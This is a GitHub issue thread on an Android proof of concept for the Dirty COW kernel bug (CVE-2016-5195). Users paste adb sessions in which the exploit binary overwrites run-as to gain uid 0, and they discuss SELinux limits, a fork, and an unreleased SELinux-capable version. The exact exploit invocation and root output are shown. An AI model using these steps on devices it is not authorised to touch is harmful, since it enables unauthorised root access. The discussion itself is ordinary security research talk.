search

timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
959 stars 395 forks source link

run-as doesn't work correctly #12

Closed ghost closed 7 years ago

ghost commented 8 years ago

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell "/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as" warning: new file size (13776) and file old size (17920) differ

size 17920

[] mmap 0xb6d3b000 [] exploit (patch) [] currently 0xb6d3b000=464c457f [] madvise = 0xb6d3b000 17920 [] madvise = 0 1048576 [] /proc/self/mem 1610612736 1048576 [*] exploited 0xb6d3b000=464c457f

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell shell@R1_HD:/ $ run-as running as uid 2000 uid 0 shell@R1_HD:/ $ run-as id running as uid 2000 uid 0 shell@R1_HD:/ $ exit

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as id running as uid 2000 uid 0

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as ls running as uid 2000 uid 0

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as ls /dev running as uid 2000 uid 0

joel0 commented 8 years ago

run-as from this repository does not run anything. It gains UID 0, then exits. It's just a proof of concept that it is possible to gain root. Due to SELinux on Android 4.4+, the run-as file can not do much of anything useful, despite its ability to set its UID to 0.

ghost commented 8 years ago

what is this that Manouchehri posted then? he is using the run-as to get root access.

Manouchehri commented 8 hours ago PS C:\Users\david> adb shell shell@flo:/ $ id uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0 shell@flo:/ $ run-as id uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0 shell@flo:/ $ ls -lZ /sbin/ opendir failed, Permission denied 1|shell@flo:/ $ run-as ls -lZ /sbin/ -rwxr-x--- root root u:object_r:rootfs:s0 adbd -rwxr-x--- root root u:object_r:rootfs:s0 healthd lrwxrwxrwx root root u:object_r:rootfs:s0 ueventd -> ../init lrwxrwxrwx root root u:object_r:rootfs:s0 watchdogd -> ../init shell@flo:/ $ cat /init.flo.diag.rc /system/bin/sh: cat: /init.flo.diag.rc: Permission denied 1|shell@flo:/ $ run-as cat /init.flo.diag.rc

This file gets copied as /init.flo.diag.rc

on post-fs-data rm /dev/diag

joel0 commented 8 years ago

He may be using something like this fork https://github.com/android-exploit/CVE-2016-5195

Manouchehri commented 8 years ago

@christianrodher That's useful for non-SELinux devices.

I have not posted my SELinux compatible version. It seems a couple journalists are getting me and @timwr mixed up.

ghost commented 8 years ago

@Manouchehri do you plan to post the compatible version?

Manouchehri commented 8 years ago

Not within the next few days. Maybe next month.

ghost commented 8 years ago

:(

timwr commented 8 years ago

@Manouchehri , is your exploit using /system/bin/run-as? Does it work from the untrusted_app sepolicy, e.g from an installed apk?

Manouchehri commented 8 years ago

I'm using a different target.

@timwr Can you send me your contact info so we can chat?

timwr commented 7 years ago

@Manouchehri you should post a poc, it'll be less confusing.